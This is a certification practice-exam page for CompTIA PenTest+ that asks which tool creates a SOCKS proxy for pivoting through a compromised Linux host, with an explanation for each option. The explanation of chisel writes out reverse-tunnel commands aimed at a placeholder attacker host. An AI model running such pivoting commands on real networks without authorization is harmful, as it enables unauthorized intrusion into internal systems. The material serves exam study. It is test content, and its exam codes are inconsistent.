Courseiva
Attacks and Exploits →hardMultiple Choice

PT0-002 Attacks and Exploits Practice Question

A penetration tester has compromised a Linux host and wants to use it as a pivot point to access an internal network that is not directly reachable from the attacker's machine. Which tool can create a SOCKS proxy for routing traffic through the compromised host?

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

✓

chisel

Chisel is a fast TCP/UDP tunnel over HTTP that can create a SOCKS proxy for pivoting.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • ✗

    Responder

    Why it's wrong here

    Responder is an LLMNR/NBT-NS/mDNS poisoning tool that forces Windows and other hosts to authenticate to an attacker, then captures password hashes or performs relay attacks; it is not a tunneling tool and provides no SOCKS proxy capability. Deploying it on a compromised Linux host would poison local link-local name resolution, creating network noise and likely triggering EDR alerts, while doing nothing to route application traffic from the attacker back through the host for pivoting.

  • ✓

    chisel

    Why this is correct

    Chisel is a single-binary client/server tunnel program that can establish an outbound reverse tunnel from a compromised Linux host to the attacker's C2 server, then expose a SOCKS5 proxy on the attacking machine at the remote end. For example, the attacker runs `chisel server --reverse --socks5` and the compromised host runs `chisel client <attacker-ip>:8080 R:socks`. Because the client makes the initial outbound connection, this evades most inbound firewall rules, and the resulting SOCKS5 proxy allows any attacker tool to route scans and traffic into the target's internal network through the compromised host.

  • ✗

    nmap

    Why it's wrong here

    Nmap is a network discovery and port scanning utility that identifies open ports, running services, and operating systems; while it can enumerate lateral movement targets on the internal segment after a foothold, it does not implement a SOCKS5 proxy or any channel for bidirectional data forwarding. Running `nmap -sV` against internal hosts tells you what to pivot to, but the actual tunnel must be created by a separate tool such as chisel or ssh.

  • ✗

    netcat

    Why it's wrong here

    Netcat (or ncat) is a raw TCP/UDP connection utility commonly used for reverse shells, port listening, and file transfer; despite having a `-L` listen/relay option on some versions, it does not natively speak the SOCKS5 protocol and cannot provide dynamic proxy functionality that browsers or proxychains can consume. Its connections are one-to-one and lack sub-protocol negotiation, so even a listener-forwarded endpoint would not appear as a SOCKS port to applications.

About these practice questions

This PT0-003 question is part of Courseiva's 777-question bank — original exam-style content with full explanations and wrong-answer analysis, never real exam questions or exam dumps. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

JA

Written by Johnson Ajibi, MSc IT Security

Senior Network & Security Engineer · founder of Courseiva

This PT0-003 practice question is part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the PT0-003 exam.